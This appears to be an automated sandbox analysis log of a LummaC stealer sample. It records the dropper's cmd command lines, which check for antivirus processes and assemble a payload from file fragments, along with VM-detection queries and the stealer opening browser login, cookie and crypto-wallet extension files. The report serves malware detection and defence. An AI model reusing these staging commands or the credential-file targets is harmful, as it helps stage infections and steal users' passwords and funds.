      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
      Query firmware table information (likely to detect VMs)
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2559Jump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com TID: 6640Thread sleep time: -90000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com TID: 6568Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5492Thread sleep count: 2559 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2508Thread sleep count: 254 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4612Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\!Set-up..exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\!Set-up..exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Campaigns Campaigns.cmd & Campaigns.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 71992Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E EcJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Ratio" Returning Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 71992\Banned.com + Fwd + Rise + Designed + Balanced + Available + Dir + Soccer + Race + Ford + Writing 71992\Banned.comJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Bids + ..\Ceo + ..\Throat + ..\Hall + ..\Access + ..\Availability + ..\Scout + ..\War VJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Banned.com VJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: extrac32.exe, 00000009.00000002.2070320335.0000000006468000.00000004.00000020.00020000.00000000.sdmp, Banned.com, 0000000D.00000000.2078597505.0000000000773000.00000002.00000001.01000000.00000007.sdmp, Race.9.dr, Banned.com.2.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
